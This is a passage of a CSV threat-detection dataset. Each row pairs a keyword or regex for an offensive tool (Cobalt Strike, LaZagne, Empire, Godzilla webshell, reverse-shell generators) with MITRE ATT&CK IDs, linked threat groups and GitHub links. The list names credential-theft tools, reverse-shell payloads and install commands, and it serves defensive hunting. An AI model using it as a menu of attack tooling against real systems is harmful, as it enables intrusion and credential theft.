RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","33961" "*apop2john.py*",".{0,1000}apop2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33962" "*App Proxy ExternalC2 POC by @_xpn_*",".{0,1000}App\sProxy\sExternalC2\sPOC\sby\s\@_xpn_.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#content","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","33963" "*app.config['graph_spy_db_folder']*",".{0,1000}app\.config\[\'graph_spy_db_folder\'\].{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#content","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","33964" "*app.config['graph_spy_db_path']*",".{0,1000}app\.config\[\'graph_spy_db_path\'\].{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#content","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","33965" "*app.pentest-tools.com*",".{0,1000}app\.pentest\-tools\.com.{0,1000}","offensive_tool_keyword","pentest-tools.com","site often consulted by pentester","T1596 - T1592","TA0043","N/A","N/A","Reconnaissance","https://pentest-tools.com","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","33966" "*app/dllproxy.nim*",".{0,1000}app\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","33967" "*app/dllproxy.nim*",".{0,1000}app\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","33968" "*'app_bound_encrypted_key' not found in Local State file*",".{0,1000}\'app_bound_encrypted_key\'\snot\sfound\sin\sLocal\sState\sfile.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","33969" "*APP_ENV_KEY = ""AutoExecByPassOpenBasedir""*",".{0,1000}APP_ENV_KEY\s\=\s\""AutoExecByPassOpenBasedir\"".{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","33970" "*appadmin9090@proton.me*",".{0,1000}appadmin9090\@proton\.me.{0,1000}","offensive_tool_keyword","Dispossessor","email account used by the ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - 
TA0009","N/A","Dispossessor","Ransomware","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","#email","N/A","10","10","N/A","N/A","N/A","N/A","33971" "*appblock*wfpsessionmanager.obj*",".{0,1000}appblock.{0,1000}wfpsessionmanager\.obj.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permitting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","33972" "*Appblock.exe --add*",".{0,1000}Appblock\.exe\s\-\-add.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permitting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","33973" "*Appblock.exe --list*",".{0,1000}Appblock\.exe\s\-\-list.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. 
Management can include blocking or permitting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","33974" "*appdata*\Windows:svchost.exe*",".{0,1000}appdata.{0,1000}\\Windows\:svchost\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","33975" "*appdata*\Windows:winrm.vbs*",".{0,1000}appdata.{0,1000}\\Windows\:winrm\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","33976" "*AppData\Roaming\(s)AINT*",".{0,1000}AppData\\Roaming\\\(s\)AINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","33979" "*Append IOC watermark to injected shellcode*",".{0,1000}Append\sIOC\swatermark\sto\sinjected\sshellcode.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","33982" "*apple_ios/aarch64/meterpreter_reverse_tcp*",".{0,1000}apple_ios\/aarch64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","33983" "*applenotes2john.py*",".{0,1000}applenotes2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33984" "*Applet_ReverseTCP.jar*",".{0,1000}Applet_ReverseTCP\.jar.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","33985" "*Application.Lazagne.H*",".{0,1000}Application\.Lazagne\.H.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","33988" "*Application::C2Sock*",".{0,1000}Application\:\:C2Sock.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","33991" "*AppLocker Bypass PowerShell Runspace.csproj*",".{0,1000}AppLocker\sBypass\sPowerShell\sRunspace\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","33997" "*applocker_enum*",".{0,1000}applocker_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","33998" "*applocker-enumerator*",".{0,1000}applocker\-enumerator.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","33999" "*AppProxyC2CertificateCreator.exe*",".{0,1000}AppProxyC2CertificateCreator\.exe.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","1","N/A","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","34000" "*apt install *tor2web*",".{0,1000}apt\sinstall\s.{0,1000}tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","34002" "*apt install asleap*",".{0,1000}apt\sinstall\sasleap.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in 
proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","0","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","34003" "*apt install crunch*",".{0,1000}apt\sinstall\scrunch.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34004" "*apt install dns2tcp*",".{0,1000}apt\sinstall\sdns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","34005" "*apt install gpp-decrypt*",".{0,1000}apt\sinstall\sgpp\-decrypt.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","34007" "*apt install gsocket*",".{0,1000}apt\sinstall\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34008" "*apt install hyperion*",".{0,1000}apt\sinstall\shyperion.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34009" "*apt install polenum*",".{0,1000}apt\sinstall\spolenum.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","34010" "*apt install powershell-empire*",".{0,1000}apt\sinstall\spowershell\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","34011" "*apt install proxychains*",".{0,1000}apt\sinstall\sproxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","https://x.com/mthcht/status/1827714529687658796","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","34012" "*apt install seclists*",".{0,1000}apt\sinstall\sseclists.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","34014" "*apt install set -y*",".{0,1000}apt\sinstall\sset\s\-y.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","34015" "*apt install tor *",".{0,1000}apt\sinstall\stor\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. 
It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","34016" "*apt install wce*",".{0,1000}apt\sinstall\swce.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","34017" "*apt install winexe*",".{0,1000}apt\sinstall\swinexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","34018" "*APT stands for Advanced Persistence Tomato*",".{0,1000}APT\sstands\sfor\sAdvanced\sPersistence\sTomato.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","34019" "*apt* install john*",".{0,1000}apt.{0,1000}\sinstall\sjohn.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34020" "*apt/etumbot.py*",".{0,1000}apt\/etumbot\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34021" "*apt/putterpanda.py*",".{0,1000}apt\/putterpanda\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34022" "*apt1_virtuallythere.profile*",".{0,1000}apt1_virtuallythere\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","34024" "*APT64/EternalHushFramework*",".{0,1000}APT64\/EternalHushFramework.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","34025" "*apt-get install *tor2web*",".{0,1000}apt\-get\sinstall\s.{0,1000}tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","34026" "*apt-get install gsocket*",".{0,1000}apt\-get\sinstall\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34027" "*apt-get install isc-dhcp-server net-tools*",".{0,1000}apt\-get\sinstall\sisc\-dhcp\-server\snet\-tools.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","34028" "*apt-get install libqt5webenginewidgets5 libqt5websockets5*",".{0,1000}apt\-get\sinstall\slibqt5webenginewidgets5\slibqt5websockets5.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - 
